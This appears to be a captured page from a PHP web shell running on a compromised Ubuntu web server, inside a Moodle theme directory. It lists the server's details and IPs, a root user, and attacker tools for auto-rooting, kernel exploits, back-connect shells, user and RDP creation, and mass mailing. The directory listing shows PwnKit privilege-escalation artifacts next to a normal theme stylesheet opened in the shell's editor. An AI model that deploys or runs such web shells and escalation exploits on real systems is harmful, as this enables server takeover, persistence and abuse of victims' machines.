Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
theme /
silky-red /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.html
135
B
-rwxrwxrwx
config.php
5.65
KB
-rwxrwxrwx
csshover.htc
3.23
KB
-rwxrwxrwx
docstyles.php
1.65
KB
-rwxrwxrwx
favicon.ico
894
B
-rwxrwxrwx
footer.html
399
B
-rwxrwxrwx
header.html
2.32
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
styles.php
914
B
-rwxrwxrwx
styles_color.css
10.87
KB
-rwxrwxrwx
styles_fonts.css
8.36
KB
-rwxrwxrwx
styles_layout.css
6.94
KB
-rwxrwxrwx
styles_tabs.css
4.73
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docstyles.php
<?PHP /* $Id: docstyles.php,v 1.3 2006/05/23 09:16:17 skodak Exp $ */ /// We use PHP so we can do value substitutions into the styles $nomoodlecookie = true; require_once("../../config.php"); $themename = optional_param('themename', NULL, PARAM_SAFEDIR); $themeurl = style_sheet_setup(filemtime("styles.php"), 300, $themename); /// /// You can hardcode colours in this file if you /// don't care about this. ?> body { background-color:#FFFFFF; } p, a { font-size:90%; } h1, h2, h3 { padding-left:0px; background-color:transparent; color:#000000; } h1 { font-size:1.7em; margin:0.5em 0 0; } h2 { font-size:1.4em; margin:0.5em 0 0; } h3 { font-size:1.2em; margin:0.5em 0 0; } li { margin-bottom: 10px; } ul { margin-top: 10px; } .question { font-size: medium; font-weight: bold; border: 1px dotted; padding: 10px; background-color: #EEEEEE; } .answer { font-size: medium; border: none; padding-left: 40px; } .normaltext { font-size: medium; border: none; margin-left: 30px; } .answercode { font-family: "Courier New", Courier, mono; font-size: small; border: none; padding-left: 60px; } .questionlink { font-size: medium; border: none; padding-left: 40px; } .examplecode { font-family: "Courier New", Courier, mono; font-size: small; border: thin dashed #999999; background-color: #FBFBFB; margin: auto; margin-top: 0.5em; padding: 30px; height: auto; width: auto; } .spaced { margin-bottom: 30px; } padding: 30px; height: auto; width: auto; } .spaced { margin-bottom: 30px; }
Close